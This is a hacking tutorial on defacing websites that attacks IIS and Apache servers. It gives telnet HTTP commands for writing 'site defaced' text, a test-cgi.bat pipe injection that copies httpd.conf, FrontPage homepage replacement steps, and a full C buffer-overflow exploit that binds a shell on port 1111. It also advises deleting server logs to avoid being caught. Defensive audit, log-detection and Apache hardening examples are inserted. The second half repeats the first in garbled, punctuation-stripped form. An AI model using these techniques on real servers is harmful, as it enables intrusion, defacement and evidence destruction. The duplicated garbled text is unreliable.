TIP Try telnetting a web server and find out some good

information about the server and its behavior

Now I am going to explain some commonly used commands

supported by a web server

GET It is used to send requests for read access to a file residing

on the server by the browser (client)

    Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
    Connected to www.hackingtheworld.ilitehost.com
    GET /index.html HTTP/1.1\r\n\r\n

Sidetrack: The HTML (Hyper Text Markup Language) source code of the index.html page residing on the server will be returned, or, if an ASP, PHP or any other server side executable page is requested, the dynamically generated HTML page will be shown.

DEL: This is a command for deleting files on the web server. This command requires write access on the virtual directory where the file to be deleted resides.

    Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
    Connected to www.hackingtheworld.ilitehost.com
    DEL /index.html HTTP/1.1\r\n\r\n

Sidetrack: Most probably you will get a 403 Forbidden error, as it is quite obvious that the wwwroot directory will never have write access.

PUT: It is used to create files on the server. It requires write access on the particular virtual directory where the file is to be created.

    Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
    Connected to www.hackingtheworld.ilitehost.com
    PUT /cc.txt HTTP/1.1\r\n\r\n

Sidetrack: Most probably you will get a 403 Forbidden error, as it is quite obvious that the wwwroot directory will never have write access.

ECHO: The publishing tool; it is the same command used in DOS (Disk Operating System) batch files. The output can be redirected.

    Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
    Connected to www.hackingtheworld.ilitehost.com
    ECHO Site defaced by SB >> index.html HTTP/1.1\r\n\r\n

TIP: SB is the acronym of my name, Shubham Bhattacharya. When you are defacing a site you can also use the acronym of your name.

PROPFIND: PROPFIND is used as a request for directory surfing.

NOTE: In IIS server it is used as an administrative tool for web server analysis.

    Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
    Connected to www.hackingtheworld.ilitehost.com
    PROPFIND / HTTP/1.1
    Host: iis-server
    Content-Length: 0

Sidetrack: You will definitely get a 403 Forbidden error, as it is quite evident that the wwwroot will never have write access.

Well, you must be wondering how you can test the write access permission for a particular directory in an IIS server.

To test the write access permission for a particular directory in an IIS server, follow the steps given below.

- To test if write access permission is enabled for anonymous web clients, telnet to the web server or the website on port 80 and make the following request:

    PUT /scripts/htw.asp HTTP/1.1
    Host: iis-server
    Content-Length: 10 <enter><enter>

Once you make the above request, the server should respond with a 100 Continue message:

    HTTP/1.1 100 Continue
    Server: Microsoft-IIS/5.0
    Date: Sun, 17 Feb 2006 10:53:00 GMT

On receiving the above, type 10 letters:

    XXXXXXXXXX

    HTTP/1.1 201 Created
    Server: Microsoft-IIS/5.0
    Date: Sun, 17 Feb 2006 10:56:08 GMT
    Location: http://iis-server/dir/my_file.txt
    Content-Length: 0
    Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

If the server responds with this 201 Created response, then write permission is enabled.
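An added example, not code from the tutorial, that turns the write-access check above into an audit script for virtual directories on servers you administer: it builds the same PUT request, sends it over a raw socket, and classifies the reply from the final status code and the Allow header. The host name iis-server, the path /scripts/htw.asp and the two sample replies are taken from the text; the function names and the Connection: close header are assumptions of this example.

```python
"""Write-access audit for a virtual directory, built from the PUT probe above.

Added example, not code from the tutorial. The host name iis-server, the path
/scripts/htw.asp and the sample replies come from the text; function names and
the Connection: close header are assumptions of this example.
"""
import re
import socket

# WebDAV/HTTP methods that change content on the server.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}


def build_put_probe(host: str, path: str, body: bytes) -> bytes:
    """Return the raw PUT request shown in the tutorial.

    The tutorial types the body after the server's 100 Continue; without an
    Expect header a client may send it straight away, which is what we do.
    """
    headers = (
        f"PUT {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return headers.encode("ascii") + body


def parse_response(raw: str):
    """Split an HTTP reply into (final status code, headers of the final message).

    An interim 100 Continue may precede the real answer, as in the tutorial's
    session, so the last status line seen is the one that counts.
    """
    status, headers = None, {}
    for block in re.split(r"\r?\n\r?\n", raw.strip()):
        lines = block.split("\n")
        m = re.match(r"HTTP/\d\.\d (\d{3})", lines[0].strip())
        if not m:
            continue
        status, headers = int(m.group(1)), {}
        for line in lines[1:]:
            if ":" in line:
                name, value = line.split(":", 1)
                headers[name.strip().lower()] = value.strip()
    return status, headers


def classify_write_probe(raw: str) -> dict:
    """Decide from the reply whether anonymous clients may write to the directory."""
    status, headers = parse_response(raw)
    advertised = {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}
    return {
        "status": status,
        "write_enabled": status in (200, 201, 204),  # 201 Created is the tutorial's success case
        "advertised_write_methods": sorted(advertised & WRITE_METHODS),
        "server": headers.get("server", ""),
        "location": headers.get("location", ""),
    }


def probe_server(host: str, port: int = 80, path: str = "/scripts/htw.asp", timeout: float = 5.0) -> dict:
    """Send the probe to a server you are responsible for and classify its reply."""
    body = b"X" * 10  # the ten letters typed in the tutorial
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_put_probe(host, path, body))
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return classify_write_probe(b"".join(chunks).decode("latin-1"))


# Replies reconstructed from the tutorial's session (constructed sample data).
SAMPLE_CREATED = (
    "HTTP/1.1 100 Continue\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Date: Sun, 17 Feb 2006 10:53:00 GMT\r\n"
    "\r\n"
    "HTTP/1.1 201 Created\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Date: Sun, 17 Feb 2006 10:56:08 GMT\r\n"
    "Location: http://iis-server/dir/my_file.txt\r\n"
    "Content-Length: 0\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK\r\n"
    "\r\n"
)
SAMPLE_FORBIDDEN = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, reply in (("created", SAMPLE_CREATED), ("forbidden", SAMPLE_FORBIDDEN)):
        print(name, classify_write_probe(reply))
```

A 201 on an anonymous PUT, or DELETE/PUT advertised in Allow for the web root, is the finding an administrator should act on by removing write permission from that virtual directory.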

EXECUTION ACCESS

Server side pages like ASP, PHP, JSP or DLL are used in highly advanced, database driven, dynamic websites, which dynamically generate the HTML and send it to the client (web browser). These server side pages and other executables, including DLL and EXE files, need execute permission in the virtual directory where they are kept.

NOTE: DLL, EXE, etc. need execute permission; they are kept in a single virtual directory.

DIRECTORY SURFING

It has often been seen that web servers, or to be more specific the virtual directories of web servers, are configured so as to provide directory surfing access to all clients, or to special clients through proper authentication. Actually, directory browsing means that you can list the files and folders present in a virtual directory, just as you see them on your standalone system. Well, most web server administrators turn off this feature, but exploit code can be used to get a directory listing of the virtual directory.

EXPLOIT FOR DIRECTORY LISTING IN APACHE

Well, if you are not familiar with Apache then let me give you a brief description. Apache is a server in which you have to configure your web server using directives and scripts. These directives and scripts are kept in the httpd.conf file, in the C:\apache group\apache\conf folder of a default Apache installation on a typical Windows system. This file contains all the settings of the web server, and if we get our hands on this file then we get to know all the settings of the web server, including the location of log files, directory permissions, write access, authentication levels, etc.

So now let's get on with the exploit. As we know, Apache is the most preferred web server. This web server has a .bat file in its cgi-bin directory. This .bat file is named test-cgi.bat. Actually, the motive of the .bat file is to test the privileges of the cgi-bin directory.

NOTE: The cgi-bin directory contains all the CGI and Perl scripts.

Well, it is quite obvious that the cgi-bin virtual directory has execute permission. These conditions are exploited to carry out pernicious attacks. The .bat file in the Apache web server is executed by DOS (Disk Operating System): a DOS shell is spawned to execute it. Now we can use the | (pipe) character along with the batch file to execute commands on the remote server.

NOTE: If you don't know how to type the | (pipe) character then don't worry. To type the pipe character press Alt together with the key that is just beside your backspace key.

So the attack URL will be like this:

    http://www.target.com/cgi-bin/test-cgi.bat|copy+conf\httpd.conf+htdocs\httpd.conf

Through the above URL I have copied the httpd.conf file from the conf directory into the Apache web root, that is the htdocs virtual folder; the conf directory itself mostly does not have read access from the web. Now we can easily download the httpd.conf file using the following URL, since the copy now resides in the Apache web root:

    http://target.com/httpd.conf

Through this method you will get the httpd.conf file, and through the httpd.conf file you can get some worthwhile information about the web server.

Inspecting known vulnerabilities

Generally websites are defaced and hacked using vulnerabilities related to the server software or the operating system running the server software. Well, most of the 'hackers' deface websites using vulnerabilities. Please note, I am talking about hackers, not script kiddies who deface websites using strange pieces of software. So you must know what a vulnerability is; well, if you don't know then let me tell you. A vulnerability is an existing flaw or defect in the software architecture which allows a hacker or cracker to take control over the system or issue arbitrary system commands to the server. In every software, application or tool, vulnerabilities persist.

    http://www.securityfocus.com
    http://www.packetstorm.org
    http://www.guininski.com
    http://www.insecure.org
    http://www.securiteam.com
    http://www.slashdot.org
    http://www.technotronic.com

The above sites contain the latest vulnerabilities with exploit code. Even if you are an elite or a professional you will find the information useful.

Working with Exploits

Well, I must say this is the most exciting part of this tutorial. Okay, so www.victim.com is the target site. Well, through the methods I have explained earlier in the tutorial we have found out that the website is running on Microsoft IIS server software. So it is time to find some vulnerability. I am using Acunetix Web Security Scanner to scan for vulnerabilities. You guys must know programming languages like Perl or C, and socket programming; this is essential because through this you will be able to compile the exploits. So once you find a vulnerability, try exploiting it by executing it in your client (browser).

MICROSOFT FRONTPAGE EXTENSION EXPLOIT

This is one of the methods for website defacement using the Microsoft Web Publishing Wizard. Using this method one can deface websites having FrontPage Server Extensions. By using the Microsoft Web Publishing Wizard one can replace FrontPage Server Extension pages.

Follow the steps given below to execute this exploit.

Telnet to the target website or web server on port 80:

    C:\> telnet www.victim.com 80

You will get a blank screen; type GET and continue pressing enter till the web server responds to your request:

    GET <ENTER><ENTER>

NOTE: Web servers running IIS have FrontPage Extensions enabled by default.

So after pressing enter you will get the following:

    HTTP/1.1 400 Bad Request
    Server: Microsoft-IIS/5.0
    Date: Thu, 17 Feb 2006 04:18:45 GMT
    Content-Type: text/html
    Content-Length: 87

Once you get the HTTP Bad Request you have to search for the homepage. Most sites have the default homepage as one of:

    http://www.victimserver.com/main.asp
    http://www.victimserver.com/index.html
    http://www.victimserver.com/index.htm
    http://www.victimserver.com/index.asp
    http://www.victimserver.com/main.htm
    http://www.victimserver.com/default.htm
    http://www.victimserver.com/default.asp
    http://www.victimserver.com/default.html

Keep trying all possible extensions until the page loads. If the extension doesn't exist then it will give a 404 error. Let us say you have got the homepage as www.victim.com/index.html; so design the page which you want to upload, or modify the homepage. Here the homepage is index.html; once you design the page or modify the page, save it as index.html.

Now open the Web Publishing Wizard and follow the steps given below:

- Open Microsoft Web Publishing Wizard.
- Now browse to the file that you are going to upload. Here index.html is the file which we are going to upload.
- Now you get a screen where you have to name the web server. Type in anything and click on Advanced.
- Select the service provider from the drop down box. This is nothing but the kind of upload it is going to do. Since your motive is to deface the site, select the FrontPage Extended Web option, since this method of defacing works only for FrontPage enabled sites.
- Type the URL of the victim server homepage in the given box; here it is www.victim.com/index.html.
- Here specify the URL that you type in the web browser to access the victim server website.
- Select the connection method that you use to access the internet.
- Click Finish. Voila, you have successfully replaced the victim's homepage with yours.

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some exploit code. I am going to present some exploit code written in the most powerful programming language, C.

    // Windows 2000 Server Exploit By CHINANSL Security Team
    // Test on Windows 2000 Chinese Version + IIS 5.0, not patched.
    // Warning: THIS PROGRAM WILL ONLY TEST.
    // CHINANSL Technology CO., LTD  http://www.chinansl.com
    // keji@chinansl.com
    // Use MS VC++ to compile this piece of code.

    #include "stdafx.h"
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <windows.h>
    #pragma comment (lib, "Ws2_32")

    int main(int argc, char *argv[])
    {
        if (argc != 4)
        {
            printf("%s ip port aspfilepath\n\n", argv[0]);
            printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n", argv[0]);
            puts(" programed by keji@chinansl.com");
            return 0;
        }
        DWORD srcdata = 0x01e2fb1c - 4;   // 0x00457474
        // address of SHELLCODE
        DWORD jmpaddr = 0x00457494;       // 0x77ebf094; 0x01e6fcec; "\x1c\xfb\xe6\x01"; "\x0c\xfb\xe6\x01"
        char *destIP = argv[1];
        char *destFile = argv[3];
        int webport = atoi(argv[2]);
        char *pad = "\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP";  // 16 bytes
        WSADATA ws;
        SOCKET s;
        long result = 0;
        if (WSAStartup(0x0101, &ws) != 0)
        {
            puts("WSAStartup() error");
            return -1;
        }
        struct sockaddr_in addr;
        addr.sin_family = AF_INET;
        addr.sin_port = htons(webport);
        addr.sin_addr.s_addr = inet_addr(destIP);
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s == -1)
        {
            puts("Socket create error");
            return -1;
        }
        if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1)
        {
            puts("Cannot connect to the specified host");
            return -1;
        }
        char buff[4096];
        // The original listing carries the shellcode as a long "\x.." hex string here;
        // that opaque byte string is not reproduced in this copy.
        char *shellcode = "<SHELLCODE BYTES OMITTED>";
        char *s1 = "POST ";  // HTTP/1.1\r\n
        char *s2 = "Accept: */*\r\n";
        char *s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
        char *s5 = "Transfer-Encoding: chunked\r\n\r\n";
        char *sc = "0\r\n\r\n\r\n";
        char shellcodebuff[1024 * 8];
        memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
        memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1], shellcode, strlen(shellcode));
        shellcodebuff[sizeof(shellcodebuff) - 1] = 0;
        char sendbuff[1024 * 16];
        memset(sendbuff, 0, 1024 * 16);
        sprintf(sendbuff, "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
                s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, sc);
        int sendlen = strlen(sendbuff);
        *(DWORD *)strstr(sendbuff, "BBBB") = jmpaddr;
        *(DWORD *)strstr(sendbuff, "AAAA") = srcdata;
        result = send(s, sendbuff, sendlen, 0);
        if (result == -1)
        {
            puts("Send shellcode error");
            return -1;
        }
        memset(buff, 0, 4096);
        result = recv(s, buff, sizeof(buff), 0);
        if (strstr(buff, "<html>") != NULL)
        {
            shutdown(s, 0);
            closesocket(s);
            puts("Send shellcode error, Try again");
            return -1;
        }
        shutdown(s, 0);
        closesocket(s);
        printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
        puts("If you cannot connect to the host, try running this program again");
        return 0;
    }

The above code is called exploit code; such code is written in powerful programming languages like C, Perl or sometimes Java. Exploit code is written according to the vulnerability. These vulnerabilities were discovered in the past; nowadays server software and operating systems are patched for them. So you can't just execute exploit code to break into a server; you must rework the exploit code so that it works according to your needs. One more thing I must mention is that you must keep yourself updated with the latest vulnerabilities by visiting the sites that I have mentioned earlier in the tutorial. Well, I think it's better that you code your own exploits in Perl or C in order to break into websites.

NOTE: I am talking about high profile websites, not lame websites coded in Notepad.

Keeping yourself safe

Well, you must be familiar with server software like Apache, Microsoft IIS, etc. So you must know about the log files, which record each and every request made to the server. As they record everything, system administrators will have no problem catching the malicious cracker or script kiddie, as the log file will have the IP (Internet Protocol) address, and through the IP address you can trace the cracker or the script kiddie.

NOTE: Read my tutorial on Gathering Information of Remote Host.

TIP: If you do not want to get busted you must clear the log files after you break into a web server.

CLEARING LOGS

You must clear the logs in order to save yourself from getting busted. So you can use a cross site scripting vulnerability to clear the log files. You can do it by executing the following URL:

    http://www.target.com/cgi-bin/test-cgi.bat|DEL+log

NOTE: The above URL can be used on Apache server software.
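An added detection example, not code from the tutorial, that scans access log lines for the requests described in the Apache directory-listing exploit earlier and in this log-clearing section: a pipe after a cgi-bin script, a DEL command behind that pipe, httpd.conf served from the web root, and write methods such as PUT. The log lines are constructed (the addresses are documentation ranges); the common log format and the function names are assumptions of this example.

```python
"""Access log detection for the requests this tutorial describes.

Added example, not part of the original text. Assumes the common log format.
The sample lines below are constructed; 203.0.113.0/24, 198.51.100.0/24 and
192.0.2.0/24 are documentation address ranges, not real clients.
"""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Methods that create, change or enumerate content; none of them belong in
# anonymous traffic against a web root.
WATCHED_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPFIND", "PROPPATCH", "LOCK", "UNLOCK"}


def analyse_line(line: str):
    """Return a finding dict for one log line, or None when nothing matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, status = m.group("method"), int(m.group("status"))
    uri = unquote(m.group("uri"))  # %7C -> |, %5C -> \ ; '+' is left alone
    path = uri.split("?", 1)[0]
    reasons, command = [], None

    if method in WATCHED_METHODS:
        reasons.append(f"{method} request")
        if status in (200, 201, 204):
            reasons.append("server accepted it")
    if "/cgi-bin/" in path.lower() and "|" in uri:
        # test-cgi.bat|<cmd>: the batch CGI hands everything after the pipe to the shell
        command = uri.split("|", 1)[1].replace("+", " ")
        reasons.append("pipe after cgi-bin script (batch CGI command injection)")
        if command.strip().lower().startswith("del"):
            reasons.append("command deletes files (log tampering?)")
    if path.lower().rsplit("/", 1)[-1] == "httpd.conf":
        reasons.append("httpd.conf fetched from web root")
    if not reasons:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "method": method,
        "uri": uri,
        "status": status,
        "command": command,
        "reasons": reasons,
    }


def scan_log(text: str):
    """Run analyse_line over every line and keep only the hits."""
    return [f for f in (analyse_line(line) for line in text.splitlines()) if f]


SAMPLE_LOG = "\n".join([  # constructed lines, not real traffic
    '203.0.113.7 - - [17/Feb/2006:10:53:00 +0000] "GET /cgi-bin/test-cgi.bat|copy+conf\\httpd.conf+htdocs\\httpd.conf HTTP/1.1" 200 0',
    '203.0.113.7 - - [17/Feb/2006:10:53:09 +0000] "GET /httpd.conf HTTP/1.1" 200 18204',
    '203.0.113.7 - - [17/Feb/2006:10:55:41 +0000] "GET /cgi-bin/test-cgi.bat%7CDEL+logs%5Caccess.log HTTP/1.1" 200 0',
    '198.51.100.4 - - [17/Feb/2006:10:56:08 +0000] "PUT /scripts/htw.asp HTTP/1.1" 201 0',
    '192.0.2.10 - - [17/Feb/2006:10:57:00 +0000] "GET /index.html HTTP/1.1" 200 4521',
])

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["method"], finding["uri"], "->", "; ".join(finding["reasons"]))
```

Because the attacker's final step is to delete the log, these rules are only useful when the log is shipped off the web server as it is written rather than read from the local file afterwards.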

In the case of IIS on Windows 2000 you can use the following method to get a DOS shell through telnet.

The CHINANSL code listed above, under Overworking known vulnerabilities to break into a server, exploits a buffer overflow in IIS 5 on Windows 2000 Server, opens port 1111 and binds a shell to it. If the exploit is successful then all you have to do is use telnet to connect to port 1111 of the target and the system is yours.


IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run it. Now you must be wondering what the use of this code is. Actually, the C code causes an overflow in IIS on Windows 2000 and commands the system to bind a shell on port 1111. So once the exploit works there will be a shell bound to port 1111 on the target system. To make use of it you must telnet to the target IP on port 1111; through this you will be connected to the system without any kind of authentication.

Various Security Measures

Website defacement has become a terrible problem for IT (Information Technology) based companies. Every day thousands of websites are defaced. Well, even government websites are defaced for different reasons; the most common reason is cyber war. Like in reality there are wars between two rival countries, similarly in the wired world there are cyber wars.

If you want to see the web attack archive, visit the following site:

    http://defaced.alldas.org

Now some security measures for system administrators:

- First of all you must coordinate and organize your web root with suitable directories. What I mean to say is that you must organize your files, like images in an image directory, one directory for server side contents, and so on and so forth. If you don't configure your web root properly then your web server will be prone to many attacks.

- You must be aware of the latest vulnerabilities; visit these sites:

    http://www.securityfocus.com
    http://www.packetstorm.org
    http://www.guininski.com
    http://www.insecure.org
    http://www.securiteam.com
    http://www.slashdot.org
    http://www.technotronic.com

Well, every web server is vulnerable, but you must not fear; you must download the latest patches for the particular vulnerability. Well, the last thing is that you must be able to predict the moves of a malicious cracker or a script kiddie. You need to know how a cracker breaks into your site or web server, you need to know the motive behind the attack, and you must think, act and work like a hacker and take the cracker out from the root.

So this completes my tutorial on defacing websites. I hope you have understood the involutions of web servers.

Edit by S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 5: Defacing Website

of server softwares are called as virtual directories Actually in a

web server each virtual directory is provided with different type

of permissions Permissions like Read Write Execution of Scripts

and Execution of Executable like Dll and server side pages like

ASP CGI etc

Now I am going to describe the methods of analyzing the

directory permission of a virtual directory residing in a web server

READ ACCESS

Whenever you visit a website through your web browser you type

in the domain name Do you know what happens when you type in

the domain name Actually when you type in the domain name

and press enter you are connected to port 80 (HTTP port) of the

IP address linked with the domain name

For Example

You type in wwwhackingtheworldilitehostcom in your web

browserrsquos address bar The IP (Internet Protocol) address of this

site is 7229654 so as soon as you press enter the URL

(Uniform Resource Locator) is redirects the IP address to

7229654indexhtml indexphp indexasp indexjsp or

whatever the index page is configured in the web server Now

once you press enter you will be redirected to Hacking the

Worldrsquos official website In the website you will be able to read

contents from its wwwroot If the wwwroot directory contains

ASP PHP or JSP then those server side pages are executed and

HTML is generated and passed to the browser (client) by IIS

(server) or any web server dynamically When you are able to read

a document from a given directory then it signals that the

directory is readable Normally it has been seen that directories

containing databases files are forbidden with read access for

security reasons

WRITE ACCESS

I will explain HTTP protocol concisely before going to Write

Access Well HTTP is a component of TCPIP stack It was

configured and formulated with the connotation of sharing files

across the Internet HTTP is the acronym of Hyper Text Transfer

Protocol The name itself indicates the description Files can be

uploaded to the server and downloaded from the server through

the HTTP protocol

NOTE Files can be uploaded to the server and downloaded from

the server through the HTTP protocol without the need of any type

of authentication

Well this was technique was employed and executed years ago

Soon computer enthusiaists realized that this kind of technique

was a huge security threat So they developed new techniques to

subdue the security threat Nowadays web servers are designed

and configured as such to give write access to only selected virtual

directories

TIP Try telnetting a web server and find out some good

information about the server and its behavior

Now I am going to explain some commonly used commands

supported by a web server

GET It is used to send requests for read access to a file residing

on the server by the browser (client)

Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

GET indexhtml HTTP11rnrn

Sidetrack The HTML (Hyper text markup language) source code of

indexhtml page occupying on the server will be regressed or if

requested for ASP or PHP or any server side executable page then

the dynamically generated HTML page will be shown

DEL This is a command for deleting files on the web server This

command requires write access on the assigned virtual directory

where the file is to be deleted

Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

del indexhtml HTTP11rnrn

Sidetrack Most probably you will get a 403 Forbidden Error as it

is quiet obvious that the wwwroot directory will never have a

write access

PUT It is used to create files on the server it necessitates write

access on the particular virtual directory where the file is to be

created

Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

PUT cctxt HTTP11rnrn

Sidetrack Most probably you will get a 403 Forbidden Error as it

is quiet obvious that the wwwroot directory will never have a

write access

ECHO The publishing tool it is the same command used in DOS

(Disk Operating System) Batch Files The output can be redirected

Microsoft Telnetgt wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

ECHO Site defaced by SB gtgt indexhtml HTTP11rnrn

TIP SB is the acronym of my name Shubham Bhattacharya

When you are defacing a site you can also use acronyms of your

name

PROPFIND Propfind is used as a request for directory surfing

NOTE In IIS server it is used as an administrative tool for web

server analysis

Microsoft Telnetgt wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

PROPFIND HTTP11

Hostiis-server

Content-Length0

Sidetrack You will definitely get a 403 Forbidden Error as it is

quiet evident that the wwwroot will never have a write access

Well you must be wondering how you can test write access

permission for a particular directory in IIS server

To test the write access permission for a particular directory in IIS

server follow the steps given below

- To test if write access permission is enabled for anonymous web

clients then telnet the web server or the website in port 80 and

make the following request

PUT scriptshtwasp HTTP11

Host iis-server

Content-Length 10 ltentergtltentergt

Once you make the following request the server should respond

with a 100 Continue Message

HTTP11 100 Continue

Server Microsoft-IIS50

Date Sun 17 Feb 2006 105300 GMT

On receiving the above type 10 letters

XXXXXXXXXX

HTTP11 201 Created

Server Microsoft-IIS50

Date Sun 17 Feb 2006 105608 GMT

Location httpiis-serverdirmy_filetxt

Content-Length 0

Allow OPTIONS TRACE GET HEAD DELETE PUT COPY

MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK

If the server responds with this 201 Created response then the

write permission is enabled

EXECUTION ACCESS

Server side pages like ASP PHP JSP or DLL are used in highly

advanced database driven dynamic websites which dynamically

generates the HTML and sends it to the client (web browser)

These server side pages and other executables including DLL and

EXE files needs execution perquisites in the virtual directory

where they are kept

NOTE DLL EXE etc need execution perquisites they are kept in a

single virtual directory

DIRECTORY SURFING

It has been often seen that web servers to be more specific

virtual directories of web servers are configured as such to

provide directory surfing access to all clients or special clients

through proper authentications Actually directory browsing

means that you can list the file and folders present in your virtual

directory just as you see in your standalone system Well most of

the web server administrators turn off this feature But exploit

codes can be used to get directory listing of the virtual directory

EXPLOIT FOR DIRECTORY LISTING IN APACHE

Well if you are not familiar with apache then let me give you a

brief description Apache is a server in which you have to

configure your web server using command and scripts These

scripts and commands are kept in httpdconf file in capache

groupapacheconf folder default Apache installation on a

distinctive windows system This file contains all the settings of

the web server and if we get our hands into this file then we get

to know all the settings of the web server including the location of

log files directory permissions write access authentication levels

etc

So now let's get on with the exploit. As we know, Apache is the most widely preferred web server. On Windows this web server ships a batch file in its cgi-bin directory, named test-cgi.bat. The purpose of the batch file is to test the privileges of the cgi-bin directory.

NOTE: The cgi-bin directory contains all the CGI and Perl scripts.

It is quite obvious that the cgi-bin virtual directory has execute permission. These conditions are exploited to carry out pernicious attacks. When the batch file is requested, the Apache web server executes it by spawning a DOS (Disk Operating System) shell. So the | (pipe) character can be appended to the batch file's URL to execute commands on the remote server.

NOTE: If you don't know how to type the | (pipe) character, don't worry: press Alt together with the key just beside your Backspace key.

So the attack URL will look like this:

http://www.target.com/cgi-bin/test-cgi.bat|copy+conf\httpd.conf+htdocs\httpd.conf

Through the above URL I have copied the httpd.conf file from the conf directory into the Apache web root, that is, the htdocs virtual folder. The conf directory itself is normally not readable through the web root. Now we can easily download the httpd.conf file with the following URL, since the copy sits in the Apache web root:

http://target.com/httpd.conf

Through this method you will get the httpd.conf file, and from the httpd.conf file you can get some valuable information about the web server.
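Looked at from the administrator's side, everything the pipe trick needs is configuration: a sample batch script left in cgi-bin, nothing stopping a copied httpd.conf from being served once it lands in htdocs, and, for the directory-surfing case above, listings left enabled. The fragment below is an added example written for this page, not the tutorial's material and not Apache's stock httpd.conf; it shows the weak settings next to the hardened ones in Apache 2.4 syntax, with the C:/... paths standing in for the Windows install the text describes.

```apache
# --- weak (what the text exploits) ---
# <Directory "C:/Apache Group/Apache/htdocs">
#     Options Indexes FollowSymLinks ExecCGI   # listings on, CGI runs from the doc root
#     Require all granted
# </Directory>
# ScriptAlias /cgi-bin/ "C:/Apache Group/Apache/cgi-bin/"   # still holding test-cgi.bat

# --- hardened ---
# 1. No directory listings and no CGI execution anywhere under the document root.
<Directory "C:/Apache Group/Apache/htdocs">
    Options -Indexes -ExecCGI
    AllowOverride None
    Require all granted
</Directory>

# 2. The conf directory is never served, and a *.conf or *.log file is refused
#    by name even if something manages to copy one into htdocs.
<Directory "C:/Apache Group/Apache/conf">
    Require all denied
</Directory>
<FilesMatch "\.(conf|log)$">
    Require all denied
</FilesMatch>

# 3. CGI runs only from the script alias, which must contain only the scripts
#    you ship. Delete the installer's samples (test-cgi, test-cgi.bat, printenv)
#    from this directory; they are what the pipe URL above abuses.
ScriptAlias /cgi-bin/ "C:/Apache Group/Apache/cgi-bin/"
<Directory "C:/Apache Group/Apache/cgi-bin">
    Options None
    AllowOverride None
    Require all granted
</Directory>

# 4. Logs live outside the web root (placeholder path) and should be forwarded
#    off-host as they are written, so a delete on the server does not end the record.
ErrorLog  "C:/logs/apache/error.log"
CustomLog "C:/logs/apache/access.log" combined
```

After changing any of these, `httpd -t` checks the syntax before a restart; a request for /httpd.conf should then answer 403 whether or not a copy exists in htdocs.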

Inspecting known vulnerabilities

Generally websites are defaced and hacked through vulnerabilities in the server software or in the Operating System running the server software. Most 'hackers' deface websites using vulnerabilities; please note I am talking about hackers, not the script kiddies who deface websites with canned software. So you must know what a vulnerability is. If you don't, let me tell you: a vulnerability is an existing flaw or defect in the software architecture which allows a hacker or cracker to take control of the system or issue arbitrary system commands to the server. Vulnerabilities exist in every piece of software, application or tool.

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

The above sites carry the latest vulnerabilities together with exploit code. Even if you are an elite or a professional, you will find the information useful.

Working with Exploits

I must say this is the most exciting part of this tutorial. Okay, so www.victim.com is the target site. Through the methods I explained earlier in the tutorial we have found out that the website is running on Microsoft IIS server software, so it is time to find some vulnerability. I am using Acunetix Web Security Scanner to scan for vulnerabilities. You must know programming languages like Perl or C, and socket programming; this is essential because it lets you compile the exploits. Once you find a vulnerability, try exploiting it by executing it in your client (browser).

MICROSOFT FRONTPAGE EXTENSION EXPLOIT

